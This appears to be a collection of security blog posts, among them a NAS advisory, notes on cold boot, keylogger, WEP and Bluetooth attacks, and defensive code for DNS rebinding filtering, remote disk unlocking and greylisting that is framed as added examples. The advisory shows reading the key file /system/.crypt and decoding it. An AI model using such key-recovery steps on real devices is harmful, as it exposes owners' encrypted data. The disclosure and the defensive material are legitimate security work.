The NAS-4220-B can hold two SATA disks. Disks are encrypted through a loopback device using AES128. The problem came to my attention when I could access the NAS after reboot without supplying the hard disk key. The key is stored in /system/.crypt; "/system" is a small configuration partition on the same disk that holds the encrypted partition. The system partition is created by the system software running on the NAS-4220. The configuration partition of the second hard disk is not mounted by default but also contains the .crypt file holding the key for the encrypted partition on the same disk.

Accessing the key (key value is the example I used):
$ cat /system/.crypt
MTIzNDU2Nzg5MDEyMzQ1Njc4OTA=

key in plain: 12345678901234567890
key in base64: MTIzNDU2Nzg5MDEyMzQ1Njc4OTA=

Base64 decode:
#!/usr/bin/python
from base64 import b64decode
print(b64decode("MTIzNDU2Nzg5MDEyMzQ1Njc4OTA="))

Reported by: Collin Mulliner
--- END ADVISORY ---
raidsonic_nas4220_crypt_disk_key_leak_09Mar2008.txt
Some guys from Princeton found a way to defeat disk encryption systems by extracting the key from the memory of a computer/laptop. While this is not really new (other people did that before), their way is quite cool. They remove the RAM module from the computer and read it in another computer; in order to do this without losing the content of the RAM module they freeze the RAM module, and with freeze they really mean freeze.
Check out the demo video.
Their paper explains it in all details. Read it if you use disk encryption and feel safe.
[1] Cold Boot Attacks on Encryption Keys (paper, video, faq, ...)
Somebody or some group seems to have found an exploitable buffer overflow in the iPhone's baseband processor. The baseband processor is the subsystem of the phone that talks to the GSM network. The overflow seems to be in the SIM Toolkit manager.
The exploit lets one upload code into the baseband, so one could insert some application into your iPhone's baseband. This application would be mostly undetectable since the baseband memory can not be read from the application processor.
Lets see what happens with this little thing...
Source:

From: steve
To: gsm@lists.segfault.net
Subject: [gsm] JerrySIM -> Executing shellcode on the iPhone baseband

Hi,
JerrySIM leaked yesterday. It was posted here: http://code.google.com/p/iphone-elite/wiki/JerrySim
The exploit code has been removed shortly after but google cached it already :/ It's out.
The program exploits a bug in the SIM Toolkit manager (which is running on the baseband) and thus enables the execution of shellcode directly on the baseband. This is good work.
This has the potential to turn the iPhone into a listening device. It still requires a lot of work and I do not know if any of the iPhone hackers is working on it.
regards,
steve

[1] code.google.com/p/iphone-elite/wiki/JerrySim
[2] Exploit code from Google cache
Here is a patch for Dnsmasq (the very popular DHCP server and DNS forwarder/cache) that will prevent DNS rebinding attacks against private networks (192.168.x.x, 10.x.x.x, ...). The patch adds a filter to the forward resolver of Dnsmasq that drops all private IP addresses contained in answers. Of course this will not prevent a rebinding attack against other IP ranges, e.g. if your local network uses some public IP range. But since Dnsmasq is mainly used for home cable/DSL routers (like the OpenWRT-based routers) this patch should offer sufficient protection.
dnsmasq_stopdnsrebind.patch (for dnsmasq 2.40)
To activate the DNS rebinding protection add --stop-dns-rebinding to the dnsmasq command line. I made it a command line option since dnsmasq is also used as a DNS cache on clients (e.g. Nokia N800) and you still want to be able to resolve local IP addresses.
Feedback is welcome!
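To show what the filter in the patch has to do on the wire, here is an added example (my own code, not the dnsmasq patch): it parses the answer section of a DNS response, including name compression, and drops every A record that points into a private range. The private-range list and the sample response built by build_response are constructed for this example.

```python
import ipaddress
import struct

# Ranges that should never show up in an answer from the public Internet:
# RFC 1918 space plus loopback, link-local and "this network".
# (List constructed for this example; the actual patch may filter differently.)
PRIVATE_NETS = [ipaddress.ip_network(n) for n in (
    "10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16",
    "127.0.0.0/8", "169.254.0.0/16", "0.0.0.0/8")]


def _read_name(msg, off):
    """Decode a DNS name at msg[off:], following RFC 1035 compression
    pointers. Returns (name, offset just past the name where it was found)."""
    labels, end, jumped = [], off, False
    while True:
        length = msg[off]
        if length & 0xC0 == 0xC0:             # 2-byte pointer to an earlier name
            ptr = struct.unpack_from("!H", msg, off)[0] & 0x3FFF
            if not jumped:
                end = off + 2
            jumped, off = True, ptr
            continue
        off += 1
        if length == 0:                       # root label terminates the name
            if not jumped:
                end = off
            return ".".join(labels), end
        labels.append(msg[off:off + length].decode("ascii"))
        off += length


def parse_a_records(msg):
    """Return [(owner, ipv4)] for every A record in the answer section."""
    qdcount, ancount = struct.unpack_from("!HH", msg, 4)
    off = 12                                  # fixed 12-byte header
    for _ in range(qdcount):
        _, off = _read_name(msg, off)
        off += 4                              # QTYPE + QCLASS
    records = []
    for _ in range(ancount):
        owner, off = _read_name(msg, off)
        rtype, _rclass, _ttl, rdlen = struct.unpack_from("!HHIH", msg, off)
        off += 10
        rdata = msg[off:off + rdlen]
        off += rdlen
        if rtype == 1 and rdlen == 4:         # TYPE A, IPv4 address
            records.append((owner, str(ipaddress.IPv4Address(rdata))))
    return records


def filter_rebind(msg):
    """Split the A records of an upstream answer into (kept, dropped):
    a record pointing into a private range is dropped, like the patch does."""
    kept, dropped = [], []
    for owner, ip in parse_a_records(msg):
        addr = ipaddress.ip_address(ip)
        private = any(addr in net for net in PRIVATE_NETS)
        (dropped if private else kept).append((owner, ip))
    return kept, dropped


def build_response(qname, ips, txid=0x1234):
    """Construct a minimal DNS response (one question, one A record per ip)
    so the example runs offline; owner names use a pointer to offset 12."""
    def enc(name):
        return b"".join(bytes([len(l)]) + l.encode("ascii")
                        for l in name.split(".")) + b"\x00"
    header = struct.pack("!HHHHHH", txid, 0x8180, 1, len(ips), 0, 0)
    question = enc(qname) + struct.pack("!HH", 1, 1)
    answers = b"".join(b"\xc0\x0c" + struct.pack("!HHIH", 1, 1, 60, 4)
                       + ipaddress.IPv4Address(ip).packed for ip in ips)
    return header + question + answers


if __name__ == "__main__":
    # Constructed sample: an attacker-controlled name that first resolved to a
    # public address and now "rebinds" to the victim's home router.
    evil = build_response("attacker.example", ["203.0.113.10", "192.168.1.1"])
    print(filter_rebind(evil))
    # -> ([('attacker.example', '203.0.113.10')], [('attacker.example', '192.168.1.1')])
```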
Links
Last week I moved my last computer to full disk encryption (FDE if you need an acronym). The last computer was my desktop/laptop, therefore I thought it would be slightly more work since I wanted to have suspend to disk (aka hibernation) - it turned out to be quite easy after all (see 1).
Previously I had set up my rented root server and my home server using a small hand-built system you can ssh to in order to open the root partition and continue to boot the real system (see 2).
In the recent days I did some research on possible attacks against fully crypted computer systems. Basically there is only one attack (if we rule out a brute force attack against the encryption key): keylogging. Keylogging basically is trying to capture all key strokes in order to obtain the passphrase for the crypted disk. Keylogging can be done in either software or hardware; both have advantages and disadvantages for both the attacker and the victim (the owner of the crypted disk).
Hardware keyloggers basically are small devices that are plugged in between the computer and the keyboard. The device then just logs all key strokes that it sees. The big advantage (for the attacker) is that this is totally OS independent. The big disadvantage for the attacker of course is that he needs physical access to the victim's computer twice (once to install, once to retrieve the logged data). Further, the victim can more or less easily find a hardware keylogger if he cares to look for one. Also there are PCI-card based keyloggers (see [3]) that are probably harder to find (the computer would need to be opened). There are also keyboards with built-in keyloggers (see [4]) but I doubt that these are any good since most people would recognize if their keyboard has suddenly changed. Of course you could also open up the victim's keyboard and place the keylogger there, but there is always a chance that you break the keyboard while doing this. The biggest disadvantage of hardware keyloggers is that these can't monitor remote login sessions, which can also be used to decrypt and boot a computer; this is where software keyloggers come into play.
Software keyloggers come in two variants: the general kernel/driver based keylogger that just monitors all keyboards and terminal devices (e.g. a remote session), and the application based keylogger where a specific application is modified so that it logs some specific or all input (e.g. the decrypt command could be modified to log the passphrase). So software keyloggers have the advantage that they can log more data (local + remote sessions) but have the big disadvantage that the attacker needs system level access to the plain, not encrypted part of the computer (e.g. the boot partition) in order to place the modified kernel or binaries. If the hardware is properly secured (e.g. not booting from external disk or cdrom) the software manipulation will take really long since the hard disk would need to be removed (or at least the PC would need to be opened). Also this might not be possible at all if the victim always boots the computer from a USB stick that he carries around with him at all times. In this case there wouldn't be a plain boot partition on the PC and therefore nothing to modify. If the victim still needs to type in the crypto password, a hardware keylogger could catch him.
Laptops seem special: while searching for keyloggers I only found that laptops are harder to attack since they are relatively small and therefore don't have much space to hide a hardware keylogger. The only thing I found was a Mini-PCI card based keylogger (see [5]), but since most laptops have Mini-PCI wireless cards this looks quite strange. Of course you could always disassemble the laptop to add a keylogger but this also takes a lot of time and there is always the chance to break it. The best time to do this would be if you send your laptop in for repair.
PDAs: I like my Palm Tungsten T5 because it supports complete filesystem encryption. Of course this encryption is not verifiable since the source is not open, but at least it is a secure algorithm (AES).
Backups: don't forget to encrypt your backups. Having a fully crypted PC and plain text backups is just stupid. Good backup software should support this. Otherwise PGP/GPG your ZIPs/tarballs/whatever.
I would say that keylogging is only feasible under certain conditions: the attacker is extremely knowledgeable and the victim is somehow unaware. All other cases would involve a huge portion of luck for the attacker.
[1] good starting point for crypto suspend: howto completely encrypted harddisk including suspend to encrypted disk with ubuntu
[2] small howto on: build a crypted root server
[3] PCI-based keylogger
[4] Keyboard with built in keylogger
[5] Mini-PCI keylogger
[6] USB keylogger
Marko Rogge finally published his article on RexSpy (see my comments on RexSpy). Marko and I talked a lot about RexSpy in order to determine if a bug/attack like Hafner described is possible at all.
The article is available as Blog Entry and PDF
One actually funny part of the whole story is that after I published my comments on RexSpy I got tons of emails from various people, some of whom seem to hope that I know how it works. So folks tried to get more information from me (I didn't have any more information). One guy even had product ideas based on this technology. Just hilarious!
Some time ago I set up a new root server for a new project of a friend and myself; this time I wanted to go full crypto. In the beginning I thought this might be a lot of work but as it turned out it is quite simple if you do some thinking.
There are many ways to do this, this is how I did it.
The setup works like this: the server boots into a minimal system starting only the SSH daemon. Then you log in and enter/upload the passphrase to unlock the disk(s). Finally you tell the system that you are done, after which you are kicked out and the system completes the boot by mounting the real root partition and executing init from there. At this point everything is as usual.
There are two basic parts in this setup: first, building a good minimal system so you don't waste too much space, and second, building the init script for the minimal system.
The minimal system needs to contain stuff like: sshd, filesystem tools such as mkfs, fsck, fdisk, etc., cryptsetup, networking tools like ifconfig, route, ip, etc., mdadm (if you run RAID), and of course all the required libraries. The easiest way to do this is using the recovery tool your hoster provides. Just set up a minimal system on one partition and strip it down before moving it to the boot partition.
The init script is quite simple, it needs to do three things: first, configure the network (IP address and route); second, start sshd; and third, start the actual system after the root partition has been unlocked. My script works as follows: after sshd has been started the script waits for a file to be created in the tmp directory. As soon as the file is created all ssh processes are killed, and the real system is booted.
Files: file list of my minimal system
init script for minimal system (touch /tmp/READY_TO_BOOT after you unlocked the root partition)
Some notes: You need to encrypt your swap, otherwise this is useless!
If you upload a key to your minimal system only upload the key to a RAM drive, never write it to disk. Otherwise all the work is useless!
Remember your key! Remember your key! Remember your key!
Todo: Filesystem integrity check for the minimal system. This is a very hard task and I don't have a solution so far.
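As an added example of the three-step init script described above (my own sketch, not the script linked from this post): configure the network, start sshd, wait for the flag file, check that the root device really got unlocked, then hand over to the real init. The device name /dev/mapper/root, the mount point, the TEST-NET addresses and the use of switch_root are assumptions for this example.

```shell
#!/bin/sh
# Init script for the minimal ssh-only system (added example). The admin logs
# in, runs "cryptsetup luksOpen <dev> root" and touches $READY_FLAG.
READY_FLAG="${READY_FLAG:-/tmp/READY_TO_BOOT}"
ROOT_DEV="${ROOT_DEV:-/dev/mapper/root}"   # assumed mapper name chosen at luksOpen
REAL_ROOT="${REAL_ROOT:-/newroot}"         # assumed mount point for the real root

# Step 1: static network so the box is reachable before any disk is unlocked.
configure_network() {
    ip addr add "$1" dev eth0 && ip link set eth0 up && ip route add default via "$2"
}

# Step 2: sshd needs /dev/pts; /tmp is a tmpfs so an uploaded key file only ever
# lives in RAM, as the note above demands.
start_sshd() {
    mkdir -p /dev/pts /var/run
    mount -t devpts devpts /dev/pts
    mount -t tmpfs tmpfs /tmp
    /usr/sbin/sshd
}

# Step 3: block until the admin signals that the unlock is done. A timeout of
# 0 means wait forever; otherwise give up after $2 seconds and return 1.
wait_for_flag() {
    flag="$1"; timeout="${2:-0}"; waited=0
    while [ ! -e "$flag" ]; do
        if [ "$timeout" -gt 0 ] && [ "$waited" -ge "$timeout" ]; then
            return 1
        fi
        sleep 1
        waited=$((waited + 1))
    done
    return 0
}

# Sanity check before handing over: the mapped block device must exist, so a
# failed luksOpen followed by an eager "touch" does not end in a kernel panic.
root_unlocked() {
    [ -b "$1" ]
}

# Step 4: kick the ssh sessions out and continue booting from the real root.
# switch_root assumes the minimal system is an initramfs; a minimal system on
# a real boot partition would use pivot_root instead.
boot_real_system() {
    killall sshd 2>/dev/null
    mkdir -p "$REAL_ROOT"
    mount "$ROOT_DEV" "$REAL_ROOT" || return 1
    exec switch_root "$REAL_ROOT" /sbin/init
}

main() {
    configure_network "$1" "$2"
    start_sshd
    # With an infinite timeout the loop only repeats when the flag was touched
    # before the root device was actually unlocked.
    until wait_for_flag "$READY_FLAG" && root_unlocked "$ROOT_DEV"; do
        echo "flag seen but $ROOT_DEV is missing; unlock it and touch $READY_FLAG again" >&2
        rm -f "$READY_FLAG"
    done
    boot_real_system
}

# Only PID 1 runs the boot sequence; sourcing the file just defines the functions.
# Addresses are TEST-NET placeholders, replace them with your hoster's values.
if [ "$$" -eq 1 ]; then
    main "192.0.2.10/24" "192.0.2.1"
fi
```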
I just benchmarked Aircrack-ptw on my Nokia N800 (ARMv6 320Mhz) and it finished in 19 seconds. Sadly enough the wireless packet injection doesn't work on the N800/770. 19 Seconds is quite impressive.
Erik Tews, with the help of two others, published a new attack on WEP called: Breaking 104 bit WEP in less than 60 Seconds.
Like the older attacks on WEP this attack uses sniffed IVs in order to break/compute/crack the WEP key. The nice thing about this attack is that it only needs between 40,000 and 85,000 unique IVs (older attacks needed between 250,000 and 1,000,000 in order to succeed). This already reduces the overall attack time since one needs to capture fewer packets. But the attack also uses a new/different attack on RC4 which further improves the speed. The paper gives an average of 3 seconds on a 1.7GHz Pentium-M. The attack even works with 5000 keys.
Paper
Info and tool
Here are the slides on RexSpy. They say nothing at all, I just post the link for completeness.
Since I first heard about RexSpy in late February (I know it was announced in October 2006) I wanted to know how real it is and how it works.
RexSpy is supposed to be the ultimate mobile phone trojan that allows one to monitor (listen to) all calls of the infected device. Also Wilfrid Hafner (the author) claims that it works on every single mobile phone.
The German Focus (a mainstream non-technical magazine) interviewed Hafner and did a trial using a SymbianOS and a WinCE based phone. They claim that he could listen to calls made with both phones. Other websites like Techworld.com quote him saying that this attack also works against a Siemens C45 (which is a very simple phone without a fancy smart phone OS).
I myself contacted Hafner to find out if he is willing to release real technical information to the public about his findings, but he refused, saying that he sold the RexSpy technology and therefore could no longer publish any material. This is very bad, especially because Hafner's company is selling a protection kit against mobile phone tapping. This makes you wonder if this is just a marketing thing.
Since I'm not a student anymore I don't have too much spare time on my hands, so I only did some basic research. The basic operation of RexSpy as claimed by Hafner is: the trojan is installed via an SMS (a Service-SMS to be precise). The trojan itself creates a kind of back channel by calling home as soon as the infected phone has an incoming or outgoing call, thereby the attacker can listen to the call. But how does this work? First idea was: a bug/feature in the GSM module or SIM card (or SIM Toolkit). A bug is kind of unlikely to be present on all platforms. A monitoring feature would be documented by someone, so this is also unlikely.
I searched a little more and found the recording of Hafner's talk at Systems; in his talk he kind of gives it away (if you know what you have to look for). He says he only implemented it for Windows Mobile (WinCE / PocketPC). That is very interesting since he first claims that RexSpy is universal across all platforms. The thing that keeps me thinking is the Service-SMS which others (including myself) call binary-SMS, since I used binary-SMS for my MMS attack. Here you basically tell the device where to download an MMS message. But as far as I remember there are other binary-SMS messages (or actually WAP Push messages that are sent via binary-SMS) that tell a mobile phone to go and download a WAP/WEB page. The URL could of course also point to an application binary, which could be downloaded and executed without user interaction. So maybe Hafner just found a small back door in the WAP Push handler that allows silent application installation, and writing a phone monitor tool for Windows Mobile and SymbianOS shouldn't be hard at all. For monitoring one could use a simple feature like a conference call; this way the trojan application would be very simplistic and small.
I'm still not 100% sure how it works (especially because he claims that it works with an old Siemens C45) but analyzing the Windows Mobile RexSpy Killer provided by SecurStar should bring me a step further (I haven't done this yet). I'll keep working on this and keep you updated.
I would really love to hear some comments on this.
Links:
Zone-H
Techworld (Hafner's talk at Systems in German language)
SecurStar
I just uploaded the web page I made for HID Attack. It explains how it all works. Enjoy.
Finally I released my HID attack kit I built over a year ago, get it here. Thanks to Thierry for including it in his talk!
Story on Heise.
Gary McGraw's Silver Bullet Podcast is a real nice podcast on computer security. If you are a security person check it out!
The Reliable Software Group (RSG) the lab I used to work for at UCSB finally put up the new website including all my Smart Phone Security research. I also put up my Master's Thesis titled Security of Smart Phones.
I also updated my Mobile Security Research website.
I'm going to do my 0wnd by an MMS talk at 23c3. The talk is more or less a redo from defcon-14, but I will try to fix it up a little. This will be my first talk at a Chaos Communication Congress and I'm already looking forward to it.
My second scientific paper, this time at ACSAC. The topic is MMS again - actually the paper was done before DEFCON. For more info see details for Session 2. The paper is the last one in the session.
PS: I also applied to 23c3 with the same topic aka the DEFCON talk.
I'll be giving a talk at this years defcon (#14). My talk will be on Advanced Attacks Against PocketPC Phones and I will show some neat new stuff for/against PocketPC phones.
I've added greylisting to the list of spam countermeasures for our server project. It works surprisingly well and the amount of spam arriving at my inbox is reduced by a ratio of 20:1. While this is good, there are of course downsides of greylisting such as an artificial delay for delivery of valid or good email. Also, auto-whitelisting should take care of regular contacts. Anyway I'm really interested in how many of our users will notice the change in amount of spam vs. delivery delay, and if any of them will demand permanent whitelisting :-)
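To make the trade-off concrete, here is an added simulation (my own code, not the server project's configuration) of the greylisting rule: a new (client IP, sender, recipient) triplet gets a temporary failure, a retry after the minimum delay is accepted, and a client that keeps retrying properly is auto-whitelisted so later mail is not delayed. The timings, thresholds and the sample traffic are constructed for this example.

```python
from dataclasses import dataclass, field

DEFER, ACCEPT = "451 try again later", "250 accepted"


@dataclass
class Greylist:
    min_delay: int = 300            # first retry must come at least this late (s)
    retry_window: int = 4 * 3600    # a retry later than this counts as a new triplet
    whitelist_after: int = 3        # accepted deliveries before the client IP skips greylisting
    seen: dict = field(default_factory=dict)      # triplet -> [first_seen, accepted_count]
    whitelist: set = field(default_factory=set)   # client IPs that proved they retry

    def check(self, client_ip, sender, recipient, now):
        """Decide on one SMTP delivery attempt at time `now` (seconds)."""
        if client_ip in self.whitelist:
            return ACCEPT                      # regular contact, no artificial delay
        key = (client_ip, sender, recipient)
        entry = self.seen.get(key)
        if entry is None or now - entry[0] > self.retry_window:
            self.seen[key] = [now, 0]          # first contact: temporary failure
            return DEFER
        if now - entry[0] < self.min_delay:
            return DEFER                       # retried too eagerly, keep waiting
        entry[1] += 1
        if entry[1] >= self.whitelist_after:
            self.whitelist.add(client_ip)      # auto-whitelist a regular contact
        return ACCEPT


def simulate():
    """Constructed traffic: a spam bot that never retries, and a proper MTA
    that retries after 10 minutes and then keeps mailing. Returns the
    decisions so the delay and the whitelisting effect are visible."""
    gl = Greylist()
    me = "me@example.org"
    bot_ip, mta_ip = "198.51.100.9", "203.0.113.25"
    results = {}
    # Spam bot: one attempt, then gone -> the mail is never delivered.
    results["bot"] = gl.check(bot_ip, "offer@spam.invalid", me, 0)
    # Legitimate MTA: attempt, an over-eager retry, a proper retry, more mail.
    results["mta"] = [gl.check(mta_ip, "friend@example.com", me, t)
                      for t in (0, 100, 600, 1200, 1800)]
    # After three accepted deliveries the IP is whitelisted, so a brand-new
    # sender from that host, long after the retry window, is not delayed.
    results["whitelisted"] = mta_ip in gl.whitelist
    results["later"] = gl.check(mta_ip, "other@example.com", me, 100000)
    # The bot never made it onto the whitelist.
    results["bot_whitelisted"] = bot_ip in gl.whitelist
    return results


if __name__ == "__main__":
    for k, v in simulate().items():
        print(k, v)
```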
My (with others) first scientific paper: Using Labeling to Prevent Cross-Service Attacks Against Smart Phones
Just put up my mobile security research page. It will basically be an annotated link collection, since my stuff will mostly be PocketPC security and I have a separate section for this. Feel free to send me additions and/or corrections.
Pierre Betouin wrote this nice little L2CAP fuzzer based on my psm_scan (l2cap port scanner). He also already discovered bugs in several phones with it.
The tool can be found at: www.secuobs.com
nice work!
mh57 just pointed me to a Spiegel Online article about Bluetooth advertising, or BlueSpam as I like to call it. It's about a German company which uses Bluetooth to beef up their billboards in Berlin. Apparently they just push images, videos, text ads and coupons to any Bluetooth device in range. This is annoying, but you can of course just ignore/reject the transmission or turn off visibility. The actual security/privacy problem is that people may get used to accepting connections from certain senders, e.g. BlueSpam (of course you wouldn't name your system BlueSpam). So what keeps me from standing next to one of the billboards naming my laptop BlueSpam and, instead of sending a coupon, sending hello.jpg? And since some phones still don't show what the Bluetooth connection is for, I just pull their phonebook etc.; the user will just see "Allow connection from BlueSpam?" Sure, I want that coupon.
This is not a good idea!
Btw. the company doing this stuff is: Wall AG
On Friday Dec. 09 another UCSB iCTF took place. As always I was just helping out (the main work is done by others: Greg, Vika and Marco) writing services, placing backdoors and doing whatever is needed. Every time the event gets bigger and bigger; this time there were 22 teams with about 20 players each plus 2-5 admins for each team and about 10+ people at UCSB organizing - this is about 500 people!
In the last years teams from Italy dominated the CTF, but not this time! The winners are all German speaking #1 Aachen, #2 Vienna and #3 Darmstadt. The full scoreboard with all teams is here.
This was really fun, even for just watching the teams fighting each other :-)
I always wanted to go crypto for my data storage but until now I never owned any big storage device. Now I have an external 250 gig USB disk which I want to secure.
The thing with crypted disks always comes down to: where can I read the disk? Only on my computer, only with one specific OS, etc. For me it's basically Linux and from time to time Windows. The two solutions I found were BestCrypt, which is commercial (at least for Windows), and dm_crypt/FreeOTFE, which is free and has many more features.
I ended up using dm_crypt/FreeOTFE.
dm_crypt is the Linux part of the crypto solution and has been part of the Linux kernel since 2.6.4. With cryptsetup it's super simple to set up. You can set up a partition or a file based crypto device. The device can then be formatted with whatever filesystem you want. Of course you need one which is readable by Windows (e.g. vfat/fat32).
FreeOTFE is the Windows counterpart of dm_crypt and can mount whatever you created with dm_crypt. I guess multi-disk volumes don't work but I haven't tried it. When mounting a filesystem use "mount Linux..." otherwise it doesn't work :)
For the external USB disk I have two partitions: one small partition which is not encrypted - this holds the Windows drivers (FreeOTFE) - and a second partition which is the crypto filesystem. With this you can also take your disk to a friend without downloading drivers and stuff from the net. All in all a nice solution.
MobileBugtraq is a new bug-tracking mailing list dedicated to mobile device technology. The list is super new, so not many posts by now. I actually only saw two so far and I couldn't find an archive.
Anyway everybody who is into mobile and security (like myself) should check it out.
While doing some web research on PDA/phone security I found this company Paraben which sells special seizure equipment for PDAs and phones. They really sell a lot of crazy stuff. I especially like the StrongHold Tent (the image on the left).
Today (at/for 21C3) Martin and I released our Bluetooth fingerprinting tool BluePrint.
It is a really nice and simple Perl script and just reads the output of sdptool (BlueZ). Please also check the Bluetooth Device Security Database.
I just started learning how to write exploits utilizing buffer overflows. It is a real fun thing to do and the best part of all: it is part of a homework for university :-) Now I know why many people write exploits; it is a nice way to get around a rainy weekend day.